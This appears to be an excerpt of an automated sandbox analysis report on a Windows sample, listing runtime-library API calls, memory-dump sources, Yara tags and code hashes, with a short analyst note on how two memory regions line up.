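Run as is, every aligned site (the three _free call sites, HeapFree, GetLastError and the two enclosing subcall functions 0043A0CA and 0043346A) comes out 020C0267 apart from its counterpart. That is the 020C0000 difference between the two region bases plus 267: a plain second mapping of the image at the new base would give exactly the base difference, so the 024C0000 region holds the same CRT code shifted by 0x267 bytes relative to its base, not the image mapped again. Records whose API ID is empty, such as the two call-less records above, carry no API String ID and are left unpaired on purpose, since there is nothing to align.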
APIs
  • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
• _free.LIBCMT ref: 0043A3D1
  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
• _free.LIBCMT ref: 0043A3DC
• _free.LIBCMT ref: 0043A3E7
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A43B
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A446
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A451
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0043A45C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                                      • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D2667
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D266D
                                                                                                                                                                                                                                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D269A
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D26A4
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D26B6
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D26CC
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D26DA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                                      • Instruction ID: 26e38f2dac3e4023e2e5585a06d76b5f3be93a43b9b04ccd42e2cf5fe1bf0ba3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D01F73D500215A7DB20FF66EC18FAF3B78AF42F52B10043BF802D2161DBA4D9048AA8
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
                                                                                                                                                                                                                                                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4227777306-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                                      • Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024D670B), ref: 024D24B6
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024D24C4
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024D24D2
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024D670B), ref: 024D2500
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 024D2507
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D2522
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D252E
                                                                                                                                                                                                                                                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2544
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024D2552
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                                                      • String ID: kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                                                      • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                                      • Instruction ID: ebd6521cd78994c65d6b730ff413855624693a4e360f8ace3d365fa691f2760a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F086759043103FB7117B757C6D91B3FADDD46A22320062BF811E2292EBB585418558
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
Strings
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: Exception@8Throw
• String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-3619870194
• Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
• Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
• Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
• Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• _memcmp.LIBVCRUNTIME ref: 0043116C
• _free.LIBCMT ref: 004311DD
• _free.LIBCMT ref: 004311F6
• _free.LIBCMT ref: 00431228
• _free.LIBCMT ref: 00431231
• _free.LIBCMT ref: 0043123D
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
Similarity
• API ID: _free$ErrorLast$_memcmp
• String ID:
• API String ID: 4275183328-0
• Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
• Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
• Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
• Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024F25EC,00000001,00000001,?), ref: 024F23F5
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024F25EC,00000001,00000001,?,?,?,?), ref: 024F247B
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024F2575
• __freea.LIBCMT ref: 024F2582
  • Part of subcall function 024F390E: RtlAllocateHeap.NTDLL(00000000,024CDAD7,00000000), ref: 024F3940
• __freea.LIBCMT ref: 024F258B
• __freea.LIBCMT ref: 024F25B0
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
• Instruction ID: 0642dd2eb166db768a0b98625d43155c98bcc3e6c1f2041f0ae306150e7229b4
• Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
• Instruction Fuzzy Hash: C251E472A00216ABEF65CF64CC60EBF77AAEB84754F15462EFE04DA240DBB4DD41CA50
APIs
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
• Instruction ID: 96b78b82e7906375045d5c8c788de5a7420c401cbafbab4d17b7c9cc150811c4
• Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
• Instruction Fuzzy Hash: FB51E972A00205ABFF249FA9CC40B6F77A9EF49376F10425FF91696291EB31D5018B64
APIs
• Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024E3051
  • Part of subcall function 024D8AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 024D8ABD
• SafeSQueue.LIBCONCRT ref: 024E306A
• Concurrency::location::_Assign.LIBCMT ref: 024E312A
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E314B
• __CxxThrowException@8.LIBVCRUNTIME ref: 024E3159
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
• String ID:
• API String ID: 3496964030-0
• Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
• Instruction ID: 669c6653efd94635fa2e009c93dcdd71215a4c799aca5a72e4c8ab8d0a16a8cd
• Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
• Instruction Fuzzy Hash: 4B31EE31A006119FDF26EF6AC890A7ABBA5AF44712F1045AED8078B255DB70A845CFC0
APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 024E8F77
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 024E8F90
• FindVITargetTypeInstance.LIBVCRUNTIME ref: 024E8F97
• PMDtoOffset.LIBCMT ref: 024E8FB6
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches
Similarity
• API ID: FindInstanceTargetType$Offset
• String ID:
• API String ID: 1467055271-0
• Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
• Instruction ID: 6d3bb7015e6ed4c77b9c5ad709421cad8b50ac3aaf097d975831374fde9240d8
• Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
• Instruction Fuzzy Hash: 5E216872A042049FEF24DFA8CC05E6E77A6EF44352B10821FE903D3290E731E941CE92
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1687354797-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                                      • Instruction ID: 2e95efde53d1a1d55f37b0c356b08edf9e84439c8fbec09670d2861229bdb023
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56217175C04208AADF55EBADD840BDEB7F9AF08325F74402FE104B7240DB7899448A75
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,024E9038,024E69C9,02500907,00000008,02500C6C,?,?,?,?,024E3CB2,?,?,0045A064), ref: 024E904F
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024E905D
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024E9076
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,024E9038,024E69C9,02500907,00000008,02500C6C,?,?,?,?,024E3CB2,?,?,0045A064), ref: 024E90C8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                                      • Instruction ID: 2714f903b9eb1b41c4c4113ca7c86f4d5b0917adb0489019d0e1b013ca9af12c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5201D4322097216FBE3527B5AC88AA72745EB05777B30033FE522553E1EF1288554D89
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,7F07A088), ref: 00428DE8
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
                                                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,7F07A088), ref: 00428E61
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                                      • Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 024C4FCA
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 024C4FE1
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
                                                                                                                                                                                                                                                                                        • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 024C4FEA
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 024C501B
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 024C5031
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 024C504F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                                      • Instruction ID: 72d8678bbb20361dd4b4f23bfdc364d9d93a667f968aed83d728c298ff0ca221
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7911A0399002189BCB65EB69D900AAE77B2BF04324F74011FE416BB390DF74AA058FD4
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 00404D7A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404D83
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00404DB4
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
• Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
• Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
• Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
• Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 024CC401
• int.LIBCPMT ref: 024CC418
  • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
  • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
• std::locale::_Getfacet.LIBCPMT ref: 024CC421
• std::_Facet_Register.LIBCPMT ref: 024CC452
• std::_Lockit::~_Lockit.LIBCPMT ref: 024CC468
• __CxxThrowException@8.LIBVCRUNTIME ref: 024CC486
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches

Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
• Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
• Instruction ID: 1ee5f96832ed2fae7e2ae468e4368d9f71a519fe0dd3b6c4ce8637cae64c223a
• Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
• Instruction Fuzzy Hash: AE11CE79900228ABCF55EBA9D884AEE7772AF40714F34411FE815AB2A0DF748A01CF94
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 024C4E8C
• int.LIBCPMT ref: 024C4EA3
  • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
  • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
• std::locale::_Getfacet.LIBCPMT ref: 024C4EAC
• std::_Facet_Register.LIBCPMT ref: 024C4EDD
• std::_Lockit::~_Lockit.LIBCPMT ref: 024C4EF3
• __CxxThrowException@8.LIBVCRUNTIME ref: 024C4F11
Memory Dump Source
• Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
Yara matches

Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
• Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
• Instruction ID: d9c20067d2a9bb7bfa1c5afec29493e2bad5dbcd634e420e7a3b0ee830e3f39b
• Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
• Instruction Fuzzy Hash: 9911AC799002289BCF55EBA9E910AAE77B2AF44324F34011FE811A72A0DF749A01CF95
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
• int.LIBCPMT ref: 0040C1B1
  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
• std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
• std::_Facet_Register.LIBCPMT ref: 0040C1EB
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
Memory Dump Source
• Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd

Similarity
